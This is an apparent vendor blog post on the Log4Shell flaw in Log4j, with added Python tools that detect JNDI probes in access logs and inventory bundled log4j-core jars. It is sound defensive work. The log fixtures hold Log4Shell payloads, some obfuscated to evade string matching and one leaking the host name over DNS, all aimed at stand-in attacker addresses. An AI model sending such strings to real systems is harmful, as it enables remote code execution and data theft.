Since the Log4j vulnerability (CVE-2021-44228, widely known as Log4Shell) became public in early December 2021, exploitation attempts have been observed at a rate of more than 100 per minute.
So, what is Log4j, and why is this flaw being called one of the worst vulnerabilities in history?
How can it affect your organization and your cyber risk exposure, and how should you assess your third parties and vendors?
What are the steps you can take to mitigate this urgent cybersecurity risk?
We bring you the answers to these critical questions.
Log4j is an open-source logging library from the Apache Software Foundation, a volunteer-run organization. Freely available open-source components like Log4j are used by programmers as building blocks for common tasks. Java programmers use Log4j to record what their applications do as they run, from errors to user activity. Part of what makes it so useful is that it does not simply copy a message string into the log: it also examines the string and interprets certain patterns in it, substituting values at the moment the message is logged.
However, as has now been exposed, that interpretation is also the flaw. One such pattern, a JNDI lookup written as ${jndi:...}, tells Log4j to fetch data from a directory service named inside the message itself, and vulnerable versions resolve it even when the string comes from an untrusted user, for example from an HTTP header or form field that the application happens to log.
The consequence: an attacker only needs to get a vulnerable application to log a crafted string. Log4j then connects to a server the attacker controls, which can hand back code that is executed on the targeted machine, enabling a wide range of actions including stealing data, taking control of the system, and installing malware. This lets attackers take over web servers remotely and gain control of the services running on them.
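To make the lookup mechanism concrete, the following is an added example written for this article, not code from the original page or from the Log4j project. It emulates in Python how Log4j resolves nested ${...} lookups from the inside out, and uses that to spot JNDI probes in web-server access logs even when the word jndi has been split across lower, upper and default-value lookups. The log lines are constructed for the example (documentation IP ranges), and the small set of emulated lookups is an assumption: a real scan should treat any nested lookup in user-supplied data as suspicious.

```python
import re

# Innermost ${...} expression: its body contains no further '$', '{' or '}'.
INNER = re.compile(r"\$\{([^${}]*)\}")
# A JNDI lookup, whatever the case of the prefix (Log4j lower-cases it).
JNDI = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)
SENTINEL = "\x00"  # masks a '$' we have decided to keep literally


def _evaluate(body):
    """Emulate the few lookups attackers use to hide the word 'jndi'.
    Returns None for lookups we do not emulate, so they are kept as-is."""
    prefix, sep, rest = body.partition(":")
    if sep and prefix.lower() == "lower":
        return rest.lower()
    if sep and prefix.lower() == "upper":
        return rest.upper()
    if ":-" in body:
        # ${env:NOPE:-j}, ${sys:x:-n}, ${::-d}: assume the variable is unset,
        # which is what the attacker relies on, so the default value wins.
        return body.split(":-", 1)[1]
    return None


def normalize(text, max_rounds=200):
    """Repeatedly resolve the innermost ${...} until nothing more resolves."""
    for _ in range(max_rounds):
        m = INNER.search(text)
        if not m:
            break
        value = _evaluate(m.group(1))
        if value is None:
            # Keep the expression but mask '$' so it is not matched again.
            value = SENTINEL + "{" + m.group(1) + "}"
        text = text[:m.start()] + value + text[m.end():]
    return text.replace(SENTINEL, "$")


def is_probe(line):
    """True if the line carries a JNDI lookup, before or after de-obfuscation."""
    return bool(JNDI.search(line) or JNDI.search(normalize(line)))


def scan(lines):
    """Return (index, normalized line) for every line that looks like a probe."""
    return [(i, normalize(line)) for i, line in enumerate(lines) if is_probe(line)]


# Constructed access-log lines; the User-Agent field is what gets logged by the app.
SAMPLE_LOG = [
    '198.51.100.7 - - [10/Dec/2021:14:02:11 +0000] "GET / HTTP/1.1" 200 "-" '
    '"${jndi:ldap://198.51.100.7:1389/a}"',
    '198.51.100.7 - - [10/Dec/2021:14:02:12 +0000] "GET / HTTP/1.1" 200 "-" '
    '"${${lower:j}${upper:n}${::-d}${env:NOPE:-i}:${lower:l}dap://198.51.100.7/x}"',
    '203.0.113.9 - - [10/Dec/2021:14:02:13 +0000] "GET /pricing HTTP/1.1" 200 "-" '
    '"Mozilla/5.0 (X11; Linux x86_64)"',
    '203.0.113.9 - - [10/Dec/2021:14:02:14 +0000] "POST /login HTTP/1.1" 401 "-" '
    '"${jnd${::-i}:dns://198.51.100.7/${hostName}}"',
]

if __name__ == "__main__":
    for index, normalized in scan(SAMPLE_LOG):
        print(f"line {index}: {normalized}")
```

The second and fourth sample lines never contain the literal text "jndi", which is why naive string matching on the raw log misses them; resolving the nested lookups the way Log4j would is what exposes the probe.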
The fact that Log4j appears in millions of devices, combined with how easy it is to exploit, makes this a grave concern. Log4j is widespread in cloud services, video games, industrial and hospital equipment, and in software and security tools.
That makes a vast number of devices potentially vulnerable and puts almost everyone at risk, including governments, corporate systems, and individuals.
For enterprises, risk exposure to the Log4j vulnerability is even greater.
With the global increase in employees working from home during the ongoing pandemic, the risk that company data on personal devices is compromised without anyone noticing grows. There is a very real risk of attackers exploiting the vulnerability in “shadow IT” appliances, those not centrally managed and therefore neither patched nor monitored.
Key suppliers, vendors, third-party providers, and even fourth-party providers in the supply chain that deliver critical support could also become a route for exploitation of the Log4j vulnerability.
Since Log4j is used in many critical supporting infrastructures such as cloud platforms, web applications, and email services, a wide range of systems could be at risk. Community-maintained lists of vulnerable applications and systems have been published on GitHub.
Moreover, most large organizations also need to be aware of the risk from their own products, which may have been built with enterprise Java software that legitimately uses Log4j.
State-sponsored and cyber-criminal attackers have been exploiting the Log4j flaw throughout December 2021 and continue to do so.
It is important to be aware that Log4j is difficult to find within your organization’s software because this open-source component is usually bundled inside other software, or pulled in as a dependency of a dependency, rather than installed on its own. Companies may not even realize they are affected.
Beyond the immediate measures, upgrading affected installations to a patched Log4j release and, where that is not yet possible, removing the JNDI lookup class from the library, the longer-term answer is to use scanning tools to build an inventory of where Log4j lives, assess your company’s exposure and impact, and review any devices where vulnerable installations may exist.
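As an added example of that inventory step, not code from this page or from MetricStream: a Python scanner that walks a directory tree, opens every jar, war, ear and zip it finds (recursing into archives nested inside archives, which is where bundled copies hide), reads the Maven pom.properties that log4j-core ships with to get the exact version, and records whether the JndiLookup class is still present. The FIXED threshold of 2.17.1 is an assumption pinned to the Apache releases current when this was written; check Apache’s Log4j security page for the version you should require. build_fixture constructs a throw-away WAR bundling a log4j-core 2.14.1 jar so the scanner can be run offline; the class-file bytes in it are a placeholder.

```python
import io
import os
import re
import sys
import tempfile
import zipfile

ARCHIVE_EXT = (".jar", ".war", ".ear", ".zip")
# Maven metadata that log4j-core ships with; it gives the exact version string.
POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
# Class implementing the ${jndi:...} lookup; absent if it was deleted as a mitigation.
JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
# Assumed threshold: verify the currently required version against Apache's advisory.
FIXED = (2, 17, 1)


def parse_version(version):
    """'2.14.1' -> (2, 14, 1); '2.0-beta9' -> (2, 0, 9); missing parts become 0."""
    nums = [int(x) for x in re.findall(r"\d+", version)]
    return tuple((nums + [0, 0, 0])[:3])


def _inspect(zf, path, findings):
    names = set(zf.namelist())
    if POM_PROPS in names:
        props = zf.read(POM_PROPS).decode("utf-8", "replace")
        m = re.search(r"^version=(.+)$", props, re.M)
        version = m.group(1).strip() if m else "unknown"
        findings.append({
            "path": path,
            "version": version,
            "jndi_lookup_present": JNDI_CLASS in names,
            "needs_upgrade": version == "unknown" or parse_version(version) < FIXED,
        })
    # Recurse into archives bundled inside this archive (WEB-INF/lib, fat jars, ...).
    for name in names:
        if name.lower().endswith(ARCHIVE_EXT):
            try:
                inner = zipfile.ZipFile(io.BytesIO(zf.read(name)))
            except zipfile.BadZipFile:
                continue
            _inspect(inner, path + "!" + name, findings)


def scan_dir(root):
    """Return one finding per copy of log4j-core found under root, however deeply nested."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for f in files:
            if f.lower().endswith(ARCHIVE_EXT):
                full = os.path.join(dirpath, f)
                try:
                    with zipfile.ZipFile(full) as zf:
                        _inspect(zf, full, findings)
                except zipfile.BadZipFile:
                    continue
    return findings


def build_fixture(root):
    """Constructed test data: a WAR that bundles log4j-core 2.14.1 under WEB-INF/lib."""
    os.makedirs(root, exist_ok=True)
    inner = io.BytesIO()
    with zipfile.ZipFile(inner, "w") as z:
        z.writestr(POM_PROPS, "groupId=org.apache.logging.log4j\n"
                              "artifactId=log4j-core\nversion=2.14.1\n")
        z.writestr(JNDI_CLASS, b"\xca\xfe\xba\xbe")  # placeholder bytes, not a real class file
    war = os.path.join(root, "app.war")
    with zipfile.ZipFile(war, "w") as z:
        z.writestr("WEB-INF/web.xml", "<web-app/>")
        z.writestr("WEB-INF/lib/log4j-core-2.14.1.jar", inner.getvalue())
    return war


def demo():
    """Build the fixture in a temporary directory and scan it."""
    root = tempfile.mkdtemp(prefix="log4j-scan-")
    build_fixture(root)
    return scan_dir(root)


if __name__ == "__main__":
    target = sys.argv[1] if len(sys.argv) > 1 else None
    for finding in (scan_dir(target) if target else demo()):
        print(finding)
```

Run it with a directory argument to scan real deployments (application servers, container image layers unpacked to disk); without one it scans the constructed fixture. The path field uses "!" to separate nesting levels, so a finding tells you exactly which outer artifact to rebuild or replace.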
MetricStream’s CyberGRC product can help you by:
MetricStream’s ConnectedGRC provides a proactive approach to compliance and risk management giving you the power to rapidly scale and adapt your programs to emerging and evolving risks. Built as an interconnected, intuitive, and intelligent GRC program, our CyberGRC product line enables your organization to collate data from across the enterprise, including third and fourth-party vendors, which can then be transformed into actionable business intelligence to support data-driven decision-making.
This will help your organization gain:
Want to learn more? Write to me at jbhowmick@metricstream.com to discuss how to mitigate your risk from the Log4j vulnerability.
Check out more resources related to cybersecurity:
The Ultimate Guide to Cyber Security and IT & Cyber Risk